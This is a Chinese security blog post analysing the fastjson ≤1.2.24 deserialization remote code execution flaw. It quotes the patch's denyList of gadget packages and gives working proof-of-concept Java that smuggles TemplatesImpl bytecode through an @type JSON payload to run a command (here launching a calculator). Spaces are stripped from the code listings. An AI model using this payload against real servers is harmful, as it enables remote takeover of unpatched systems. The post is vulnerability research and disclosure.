2017-05-02 15:50:23
阅读:563次
点赞(0)
收藏
作者:廖新喜@绿盟科技
blog:http://xxlegend.com
背景
fastjson是一个java编写的高性能功能非常完善的JSON库,应用范围非常广,在github上star数都超过8k,在2017年3月15日,fastjson官方主动爆出fastjson在1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。关于漏洞的具体详情可参考 https://github.com/alibaba/fastjson/wiki/security_update_20170315
受影响的版本
fastjson <= 1.2.24
静态分析
根据官方给出的补丁文件,主要的更新在这个checkAutoType函数上,而这个函数的主要功能就是添加了黑名单,将一些常用的反序列化利用库都添加到黑名单中。具体包括
bsh,com.mchange,com.sun.,java.lang.Thread,java.net.Socket,java.rmi,javax.xml,org.apache.bcel,org.apache.commons.beanutils,org.apache.commons.collections.Transformer,org.apache.commons.collections.functors,org.apache.commons.collections4.comparators,org.apache.commons.fileupload,org.apache.myfaces.context.servlet,org.apache.tomcat,org.apache.wicket.util,org.codehaus.groovy.runtime,org.hibernate,org.jboss,org.mozilla.javascript,org.python.core,org.springframework下面我们来分析checkAutoType的函数实现:
publicClass<?>checkAutoType(StringtypeName,Class<?>expectClass){ if(typeName==null){ returnnull; } if(typeName.length()>=maxTypeNameLength){ thrownewJSONException("autoTypeisnotsupport."+typeName); } finalStringclassName=typeName.replace('$','.'); if(autoTypeSupport||expectClass!=null){ for(inti=0;i<acceptList.length;++i){ Stringaccept=acceptList[i]; if(className.startsWith(accept)){ returnTypeUtils.loadClass(typeName,defaultClassLoader); } } for(inti=0;i<denyList.length;++i){ Stringdeny=denyList[i]; if(className.startsWith(deny)){ thrownewJSONException("autoTypeisnotsupport."+typeName); } } } Class<?>clazz=TypeUtils.getClassFromMapping(typeName); if(clazz==null){ clazz=deserializers.findClass(typeName); } if(clazz!=null){ if(expectClass!=null&&!expectClass.isAssignableFrom(clazz)){ thrownewJSONException("typenotmatch."+typeName+"->"+expectClass.getName()); } returnclazz; }核心部分就是denyList的处理过程,遍历denyList,如果引入的库以denyList中某个deny打头,就会抛出异常,中断运行。
POC构造
静态分析得知,要构造一个可用的poc,肯定得引入denyList的库。刚开始fastjson官方公布漏洞信息时,当时就尝试构造poc,怎奈fastjson的代码确实庞大,还有asm机制,通过asm机制生成的临时代码下不了断点。当时也只能通过在通过类初始化的时候弹出一个计算器,很显然这个构造方式不具有通用性,最近jackson爆出反序列漏洞,其中就利用了TemplatesImpl类,而这个类有一个字段就是_bytecodes,有部分函数会根据这个_bytecodes生成java实例,简直不能再更妙,这就解决了fastjson通过字段传入一个类,再通过这个类执行有害代码。后来阅读ysoserial的代码时也发现在gadgets.java这个文件中也使用到了这个类来动态生成可执行命令的代码。下面是一个poc的代码
importcom.sun.org.apache.xalan.internal.xsltc.DOM; importcom.sun.org.apache.xalan.internal.xsltc.TransletException; importcom.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; importcom.sun.org.apache.xml.internal.dtm.DTMAxisIterator; importcom.sun.org.apache.xml.internal.serializer.SerializationHandler; importjava.io.IOException; publicclassTestextendsAbstractTranslet{ publicTest()throwsIOException{ Runtime.getRuntime().exec("calc"); } @Override publicvoidtransform(DOMdocument,DTMAxisIteratoriterator,SerializationHandlerhandler){ } @Override publicvoidtransform(DOMdocument,com.sun.org.apache.xml.internal.serializer.SerializationHandler[]handlers)throwsTransletException{ } publicstaticvoidmain(String[]args)throwsException{ Testt=newTest(); } }这个是Test.java的实现,在Test.java的构造函数中执行了一条命令,弹出计算器。编译Test.java得到Test.class供后续使用。后续会将Test.class的内容赋值给_bytecodes。接着分析poc
packageperson; importcom.alibaba.fastjson.JSON; importcom.alibaba.fastjson.parser.Feature; importcom.alibaba.fastjson.parser.ParserConfig; importorg.apache.commons.io.IOUtils; importorg.apache.commons.codec.binary.Base64; importjava.io.ByteArrayOutputStream; importjava.io.File; importjava.io.FileInputStream; importjava.io.IOException; /** *Createdbywebon2017/4/29. */ publicclassPoc{ publicstaticStringreadClass(Stringcls){ ByteArrayOutputStreambos=newByteArrayOutputStream(); try{ IOUtils.copy(newFileInputStream(newFile(cls)),bos); }catch(IOExceptione){ e.printStackTrace(); } returnBase64.encodeBase64String(bos.toByteArray()); } publicstaticvoidtest_autoTypeDeny()throwsException{ ParserConfigconfig=newParserConfig(); finalStringfileSeparator=System.getProperty("file.separator"); finalStringevilClassPath=System.getProperty("user.dir")+"\\target\\classes\\person\\Test.class"; StringevilCode=readClass(evilClassPath); finalStringNASTY_CLASS="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"; Stringtext1="{\"@type\":\""+NASTY_CLASS+ "\",\"_bytecodes\":[\""+evilCode+"\"],'_name':'a.b',\"_outputProperties\":{},"+ "\"_name\":\"a\",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}\n"; System.out.println(text1); Objectobj=JSON.parseObject(text1,Object.class,config,Feature.SupportNonPublicField); //assertEquals(Model.class,obj.getClass()); } publicstaticvoidmain(Stringargs[]){ try{ test_autoTypeDeny(); }catch(Exceptione){ e.printStackTrace(); } } }在这个poc中,最核心的部分是_bytecodes,它是要执行的代码,@type是指定的解析类,fastjson会根据指定类去反序列化得到该类的实例,在默认情况下,fastjson只会反序列化公开的属性和域,而com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl中_bytecodes却是私有属性,_name也是私有域,所以在parseObject的时候需要设置Feature.SupportNonPublicField,这样_bytecodes字段才会被反序列化。_tfactory这个字段在TemplatesImpl既没有get方法也没有set方法,所以是设置不了的,弹计算器的图中的poc中展示了但是实际运行却没有使用,只能依赖于jdk的实现,作者在1.8.0_25,1.7.0_05测试都能弹出计算器,某些版本中在defineTransletClasses()用到会引用_tfactory属性导致异常退出。接下来我们看下TemplatesImpl.java的几个关键函数:
publicsynchronizedPropertiesgetOutputProperties(){ try{ returnnewTransformer().getOutputProperties(); } catch(TransformerConfigurationExceptione){ returnnull; } } publicsynchronizedTransformernewTransformer() throwsTransformerConfigurationException { TransformerImpltransformer; transformer=newTransformerImpl(getTransletInstance(),_outputProperties, _indentNumber,_tfactory); if(_uriResolver!=null){ transformer.setURIResolver(_uriResolver); } if(_tfactory.getFeature(XMLConstants.FEATURE_SECURE_PROCESSING)){ transformer.setSecureProcessing(true); } returntransformer; } privateTransletgetTransletInstance() throwsTransformerConfigurationException{ try{ if(_name==null)returnnull; if(_class==null)defineTransletClasses(); //Thetransletneedstokeepareferencetoallitsauxiliary //classtopreventtheGCfromcollectingthem AbstractTranslettranslet=(AbstractTranslet)_class[_transletIndex].newInstance(); translet.postInitialization(); translet.setTemplates(this); translet.setServicesMechnism(_useServicesMechanism); if(_auxClasses!=null){ translet.setAuxiliaryClasses(_auxClasses); } returntranslet; } catch(InstantiationExceptione){ ErrorMsgerr=newErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR,_name); thrownewTransformerConfigurationException(err.toString()); } catch(IllegalAccessExceptione){ ErrorMsgerr=newErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR,_name); thrownewTransformerConfigurationException(err.toString()); } } privatevoiddefineTransletClasses() throwsTransformerConfigurationException{ if(_bytecodes==null){ ErrorMsgerr=newErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR); thrownewTransformerConfigurationException(err.toString()); } TransletClassLoaderloader=(TransletClassLoader) AccessController.doPrivileged(newPrivilegedAction(){ publicObjectrun(){ returnnewTransletClassLoader(ObjectFactory.findClassLoader()); } }); try{ finalintclassCount=_bytecodes.length; _class=newClass[classCount]; if(classCount>1){ _auxClasses=newHashtable(); } for(inti=0;i<classCount;i++){ _class[i]=loader.defineClass(_bytecodes[i]); finalClasssuperClass=_class[i].getSuperclass(); //Checkifthisisthemainclass if(superClass.getName().equals(ABSTRACT_TRANSLET)){ _transletIndex=i; } else{ _auxClasses.put(_class[i].getName(),_class[i]); } } if(_transletIndex<0){ ErrorMsgerr=newErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR,_name); thrownewTransformerConfigurationException(err.toString()); } } catch(ClassFormatErrore){ ErrorMsgerr=newErrorMsg(ErrorMsg.TRANSLET_CLASS_ERR,_name); thrownewTransformerConfigurationException(err.toString()); } catch(LinkageErrore){ ErrorMsgerr=newErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR,_name); thrownewTransformerConfigurationException(err.toString()); } }在getTransletInstance调用defineTransletClasses,在defineTransletClasses方法中会根据_bytecodes来生成一个java类,生成的java类随后会被getTransletInstance方法用到生成一个实例,也也就到了最终的执行命令的位置Runtime.getRuntime.exec()
下面我们上一张调用链的图,
,简单来说就是
JSON.parseObject ... JavaBeanDeserializer.deserialze ... FieldDeserializer.setValue ... TemplatesImpl.getOutputProperties TemplatesImpl.newTransformer TemplatesImpl.getTransletInstance ... Runtime.getRuntime().exec附上一张成功执行图:
总结
poc影响jdk 1.7,1.8版本,1.6未测试,但是需要在parseObject的时候设置Feature.SupportNonPublicField,最后给大家上个福利,github地址:完整的Intellij IDEA poc环境:https://github.com/shengqi158/fastjson-remote-code-execute-poc
本文转载自 廖新喜@绿盟科技
原文链接:http://blog.nsfocus.net/fastjson-remote-deserialization-program-validation-analysis/